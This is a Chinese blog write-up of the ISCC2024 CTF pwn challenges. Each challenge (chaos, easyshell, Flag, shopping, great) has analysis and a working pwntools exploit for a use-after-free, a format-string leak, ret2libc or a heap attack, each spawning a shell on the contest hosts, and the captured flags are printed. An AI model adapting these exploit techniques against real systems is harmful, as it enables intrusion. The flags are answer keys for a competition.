ISCC2024--pwn

原创 已于 2025-05-02 11:15:47 修改 · 1k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全 #linux #ubuntu

于 2024-06-25 16:03:30 首次发布

ISCC2024

练武题

chaos

考点:基础UAF

分析

1.首先将附件放入IDA查看主函数功能,进入菜单函数:
在这里插入图片描述

  1. 注意到选项5不太一样,跟进该功能模块的函数查看:
    联想截图_20240502214444.png
    联想截图_20240502214454.png

联想截图_20240502214723.png

  1. 分析得到该功能存在UAF漏洞,system(/bin/sh) 执行的前提是指针ptr指向的内容前四个字符是“Flag”,因此利用UAF漏洞将该堆块收回,接着填充内容为“Flag”即可获取shell,最后进入靶机输入 cat /flag.txt 获取flag。
exp
# 最基本的UAF,键入选项五,申请0x68【键入size=96】大小的堆块,输入“Flag”即可获取shell。
from pwn import *
io = remote('182.92.237.102',10010)
io.interactive()

#  ISCC{751503af-4116-45a3-a43c-a06add4a9386}

easyshell(⭐)

考点:64位leak_fmt + PIE基地址跳转
坑点:后门函数不能填充起始地址【可能是因为堆栈不平衡】,使用 mov rdi /bin/sh 处地址即可。

分析
  1. 首先分析主要函数core_code函数代码如下,发现存在栈溢出漏洞和格式化字符串漏洞【需要输入flagis前缀来触发】:

联想截图_20240502221341.png
在这里插入图片描述

  1. 由于程序运行存在while循环,可以无限次输入,直到输入exit才会退出循环,执行 rbp+0x8 地址的内容。由于程序存在canary保护并且开启了PIE,因此可以利用fmt泄露canary的值和栈上某一函数的实际地址。

【由于PIE开启后,函数地址后12位字节不会变化,因此IDA里面查得函数地址后三位是不会变的。】
然后利用 程序基地址 = 该函数实际地址 - IDA里面对应该函数的后三位地址,进而得到基地址;而实际
后门函数地址 = 基地址 + IDA里面对应地址后三位,填充到返回地址。最后利用 exit 跳转到后门函数获取shell。
easyshell.png
分析程序栈结构得到所需canary偏移位 15,泄露函数【main+254】偏移是17,IDA对应地址为 0x1520。
在这里插入图片描述
在这里插入图片描述

exp
#  【开启PIE,低地址跳转】ret2text,
#  首先输入 flagis + %n$p 获取canary 和 main+254 实际地址,进而得到基地址,
#  加上后门函数的偏移得到真实地址。然后利用gets栈溢出覆盖返回地址为后门函数地址
# 【直接填充起始地址会出错,填充 mov rdi /bin/sh 处地址可以打通】,即可获得shell。

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
io = remote('182.92.237.102',10011)
p1 = b'flagisa' + b'%15$p'
p2 = b'flagisa' + b'%17$p'
io.sendlineafter(b'>>',p1)
io.recvuntil(b'0x')
canary = int(io.recv(16),16)
print(hex(canary))
io.sendlineafter(b'>>',p2)
io.recvuntil(b'0x')
main_254 = int(io.recv(12),16)
print(hex(main_254))
base = main_254 - 0x520
shell = 0x291 + base
print(hex(shell))
p2 = b'a'*0x38+p64(canary)+p64(0)+p64(shell)
io.sendlineafter(b'>>',p2)
io.sendlineafter(b'>>',b'exit')
io.interactive()	 
#  ISCC{b1e99cf8-d13f-4a99-a12e-3ca0b0716d1a}

Flag

考点:fmt + 32位ret2libc3
坑点:libc版本问题

分析

分析welcome函数,发现格式化字符串漏洞,可以泄露canary。back函数存在read栈溢出,打ret2libc_3泄露libc的基地址,然后在线搜索libc版本。下载并使用system函数和/bin/sh字符串地址,构造system(/bin/sh) 填充返回地址,获取shell。
联想截图_20240502224625.png
在这里插入图片描述

本地测试查看canary偏移量。
Flag1.png
Flag2.png

exp
#  格式化字符串泄漏canary,32位ret2libc3。注意libc版本问题
from pwn import *
io = remote('182.92.237.102',10012)
elf = ELF('./Flag')
context(log_level = 'debug')
puts_plt = elf.plt['puts']
puts_got =  elf.got['puts']
main_addr = elf.sym['back']

p1 = b'%19$p'
io.sendlineafter(b"what's the content?\n",p1)

io.recvuntil(b'0x')
canary = int(io.recvline(),16)

offset = 0x88

pop_ebx = 0x8049022
p2 = b'a'*offset  + p32(canary) + 3*p32(0) + p32(puts_plt) + p32(main_addr) + p32(puts_got)        
io.sendlineafter(b'Input:\n',p2)

puts_addr = u32(io.recvuntil(b'\xf7')[-4:])
print(hex(puts_addr))

libc = LibcSearcher("puts",puts_addr)
libc = ELF('./libc6-i386_2.31-0ubuntu9.14_amd64.so')
libc_base =  puts_addr - libc.sym['puts']
sym = libc_base + libc.sym['system']
bin = libc_base + next(libc.search(b'/bin/sh'))

payload2 = b'a'*offset  + p32(canary) + 3*p32(0) + p32(sym)  + p32(0) + p32(bin)
io.sendlineafter(b'Input:\n',payload2)

io.interactive()

#  ISCC{38a24130-0a34-490b-836b-0442c858e5aa}

shopping(⭐⭐)

参考ctfshow–pwn180【还没做…】,几乎一模一样。

分析

exp
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote('182.92.237.102',10019)
elf = ELF('./shopping')
system_plt = elf.plt['system']
io.sendlineafter('Enter the password: \n',"I'm ready for shopping")

def add(size,n,content=''):
	io.sendlineafter(b'Action:',b'1')
	io.sendlineafter(b'Item ID: ',str(size))
	io.sendlineafter(b'Quantity: ',str(n))
	if content == '':
		io.sendlineafter('Add gift message? (0/1): ','0')
	else:
		io.sendlineafter('Add gift message? (0/1): ','1')
		io.sendafter(b'Message: ',content)

for i in range(12):
	add(0x4000,1000)
add(0x4000,262,'0'*0x3FF0)
payload = b'1'*0x50 + p32(0) + p32(3) + 10*p64(0x60201d)
sleep(0.2)
io.send(payload)
sleep(0.2)
payload = b'/bin/sh'.ljust(0xB,b'\x00') + p64(system_plt)
payload = payload.ljust(0x60,b'b')
add(0x60,0,payload)

io.interactive()

# ISCC{xdyxrI87xohgzADH6wp5Xh6uonw61xa6WfLr}

from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
#io = remote('127.0.0.1',10000)
io = remote('pwn.challenge.ctf.show',28117)
elf = ELF('./pwn180')
system_plt = elf.plt['system']
io.sendlineafter('password:',"WTF Arena has a secret!")

def add(size,n,content=''):
	io.sendlineafter('Action:','1')
	io.sendlineafter('Size:',str(size))
	io.sendlineafter('Pad blocks:',str(n))
	if content == '':
		io.sendlineafter('Content? (0/1):','0')
	else:
		io.sendlineafter('Content? (0/1):','1')
		io.sendafter('Input:',content)

for i in range(12):
	add(0x4000,1000)
add(0x4000,262,'0'*0x3FF0)
payload = b'1'*0x50 + p32(0) + p32(3) + 10*p64(0x60201d)
sleep(0.2)
io.send(payload)
sleep(0.2)
payload = b'/bin/sh'.ljust(0xB,b'\x00') + p64(system_plt)
payload = payload.ljust(0x60,b'b')
add(0x60,0,payload)

io.interactive()

擂台题

great

考点:32位ret2libc_3

分析

首先根据IDA源码依次输入“yes”进入welcome函数 和“OK”进入great函数。在great函数发现栈溢出,直接打ret2libc_3即可,将第一次返回地址填充为great函数地址,这样第二次就不用一层一层进来了。
联想截图_20240502230138.png
联想截图_20240502230148.png
联想截图_20240502230213.png

exp
#  常规32位 ret2libc3
from pwn import *
from LibcSearcher import *
io = remote('182.92.237.102',10014)
elf = ELF('./great')
context(log_level = 'debug')
puts_plt = elf.plt['puts']
puts_got =  elf.got['puts']
main_addr = elf.sym['great']
io.sendlineafter(b'ISCC?\n',b'yes')
io.sendlineafter(b'great.\n',b'OK')

payload1 = b'a'*112  + p32(puts_plt) + p32(main_addr) + p32(puts_got)        

io.sendlineafter(b'Here it is!\n',payload1) 
puts_addr = u32(io.recvuntil(b'\xf7')[-4:])

print(hex(puts_addr))

libc = LibcSearcher("puts",puts_addr)
libc_base =  puts_addr - libc.dump('puts')
sym = libc_base + libc.dump('system')
bin = libc_base + libc.dump('str_bin_sh')

payload2 = b'a'*112 + p32(sym) + p32(main_addr) + p32(bin)
io.sendlineafter(b'Here it is!\n',payload2) 

io.interactive()

#  ISCC{1c2bac74-155f-4082-9300-807d5414da63}
2022ISCC PWN
山高路远
07-05 2693
2022ISCC
ISCC部分pwn题解
qq_46441427的博客
05-25 2169
菜的扣脚刚刚入门堆的辣鸡pwn手 M78 整型漏洞,那个262有点迷,感觉是263 flag{N@x_addr_*EnaBleD%} game 随机数的题,利用python脚本修改随机数种子 再写一个C脚本算随机数 成功拿到flag ISCC{this****&haobdvaljdnvoa0%bor} BOX 有libc,查看发现是libc2.27考虑tcache 写增删改查函数 泄露libc 计算malloc 最后劫持程序流 ISCC{angav**anva&77lnv
ISCC2021-[pwn]game
半岛铁盒的博客
05-26 754
from pwn import * from ctypes import * p = remote('39.96.88.40','7040') context.log_level="debug" payload = b'a' * (0x30-0x8) + p32(0) p.sendlineafter("Your name is :",payload) rand = ['55 ','15 ','82 ','1 ','98 ','68 ','67 ','15 ','86 ','3 '] fo...
ISCC 2024 部分wp
热门推荐
焦虑的焦虑
05-25 1万+
ISCC 2024 部分wp
ISCC2024信息安全与对抗技术竞赛,pwn-chaos WriteUp
mzk051229的博客
06-11 535
ISCC pwn1-chaos的WriteUp
ISCC2022--Writeup
m0_61596829的博客
06-03 7656
ISCC2022--writeup
ISCC--实战第一阶段(记Drupal漏洞利用)
qq_73767109的博客
05-19 551
或者进入pycharm中(如果是用pycharm的话)在里面搜索beautifulsoup4下载即可。使用最常见的cve-2018-7600漏洞。如果报错可以尝试进入python输入。输入ps -ef查看进程即可。按要求下载VPN连接后。用linux搜索相关漏洞。在网上搜索该漏洞的poc。把地址改成需要利用的地址。
ISCC-2024-第21届信息安全与对抗技术竞赛通知
m0_46621218的博客
04-19 5363
信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越容易遭受攻击,遭受攻击的后果越严重。“网络安全和信息化是一体之两翼、驱动之双轮。没有网络安全就没有国家安全。”信息是社会发展的重要战略资源,国际上围绕信息的获取、使用和控制的斗争愈演愈烈,信息安全保障能力是综合国力、经济竞争实力和生存能力的重要组成部分,是世纪之交世界各国奋力攀登的至高点。信息安全与对抗技术竞赛(ISCC),于2004年创建(国内第一),已连续举办。
180509 Pwn-ISCCPwn2)
whklhhhh的博客
05-25 954
写作Pwn3读作Pwn2 23333 打开pwn3反编译,发现菜单,很明显是堆的题目了 看了一下在free的时候没有清空指针,造成野指针 以我浅薄的知识猜想是double free吧 参考ctf-wiki的fastbin-attack 主要漏洞在于通过fastbin管理堆的情况下,在free时仅会检查链表头部(即main_arena指向)的chunk 第一次释放free(chun...
ISCC2017 pwn 200 —— 字符串格式化漏洞
giantbranch的专栏
05-31 3797
简介  这是一道字符串格式化漏洞的题目,给了libc,直接字符串格式化漏洞泄露出地址,就可以算出system的地址,最后再写got表就行了伪代码int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [sp+14h] [bp-6Ch]@3 int v4; // [sp+1
2019_iscc_pwn350
Jc
05-26 581
引 1.这个道题有两个考察点 一个是ret2dl的了解(只要看过这个技术的,都知道哪里只需要拿过来使用就可以了)还有一个就是main函数末尾的堆栈平衡(自己在这里卡了好久) offset 相信解决的offset的大小,这道题有迎刃而解了(先补充一个知识点,对于新手) 1.第一个图是pwn350 第二个图是普通的main函数结尾处 2.IDA手动输入一下,会发现 ...
pwn1
WYJ____的博客
05-10 1185
ls 列出文件和目录。 ls -l 列出文件的详细信息。 cat flag 显示文件flag的内容。
ISCC2024个人挑战赛WP-WEB
qq_59468567的博客
05-26 1439
(非官方解,以下内容均互联网收集的信息和个人思路,仅供学习参考) GET /world.js HTTP/1.1Host: 101.200.138.180:17345Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateA
ISCC2024之Misc方向WP
ASD830的博客
06-01 1890
使⽤该脚本跑出来以 abcdadadef 开头的⼀串字符,这刚好对应 ISCC{ 的⼗六进制“495343437b”,最后两个字符⼀定对应的是 } 的⼗六进制“7d”,其他的字符就需要反复的推敲。{}内部全都是⼩写字⺟和_ ,所以最终还是很容易推出⼀张映射表的。得到的并不是flag,用pr3550nwardsa2fee6e0去解密7z文件,成功得到一个新的rar文件,但是也是加密的,猜测密钥为大写的刚才的“flag”:PR3550NWARDSA2FEE6E0,得到一堆空文件,仔细观察发现时间有问题。
2024ISCC练武题部分WriteUp
Aluxian_的博客
05-27 3486
2024ISCC练武题部分WriteUp
2024 高校网络安全管理运维赛 -实践能力赛项Writeup(misc-2部分解析)
weixin_39435784的博客
05-09 841
2024 高校网络安全管理运维赛 -实践能力赛项Writeup(misc-2部分解析)
ISCC2024个人挑战赛WP-Mobile
qq_59468567的博客
05-30 1265
(非官方解,以下内容均互联网收集的信息和个人思路,仅供学习参考)
2024ISCC练武题 MISC Number_is_the_key 考点:ctf excel ,及坐标转化为1 脚本
2301_79921364的博客
05-29 412
放在010里面看到开头 50 4B 03 04,就该后缀为zip,打开后找到一个这个,用记事本记录这些坐标,记住,这里和 ctf excel考点 有些像,如果忘了去搜搜再复习一下。到这里之后就和 ctf excel考点 一样啦,把1替换成黑色背景。
ISCC2024个人挑战赛WP-Flag
qq_59468567的博客
05-30 488
有一个fmt漏洞,但是需要和远程中的help.txt字符相同才行,随便测试一下发现第一个字符是a。back函数里面溢出,先利用fmt函数泄露出canary,然后利用溢出打正常的ret2libc。
isctf2024 pwn
最新发布
12-28
### ISCTF 2024 Pwn Challenge Solutions and Resources For challenges within the ISCTF 2024 Pwn category, participants often face tasks that involve exploiting software vulnerabilities to gain unauthorized access or execute arbitrary code. The provided command `kubectl get deployments,services -l challenge=challenge-name` can be used to list Kubernetes resources related to a specific challenge by applying labels[^1]. This approach is useful when dealing with containerized applications where infrastructure as code plays an essential role. However, solving pwn challenges typically requires understanding common exploitation techniques such as buffer overflows, format string bugs, use-after-free errors, etc., which are not directly addressed through Kubernetes commands alone. Participants should focus on learning about these attack vectors along with defensive coding practices to both exploit weaknesses safely and secure their own systems against similar attacks. Regarding silicon-validated System-on-Chip (SoC) implementations like those mentioned for PicoSoc/PicoRV32, while interesting from a hardware perspective, they do not directly apply to typical web-based or application-layer CTF problems unless specifically designed into the challenge scenario[^2]. It's important to adhere strictly to ethical guidelines when engaging in any cybersecurity activities; all efforts must remain legal and responsible at all times[^3]. To effectively tackle pwn challenges: - Study past CTF events' write-ups focusing on binary exploitation. - Practice using platforms dedicated to improving reverse engineering skills. - Explore documentation around low-level programming languages and operating system internals. ```bash # Example of listing relevant Kubernetes objects tagged under 'pwn' $ kubectl get pods,services,jobs -l track=pwn ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

暮夜--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值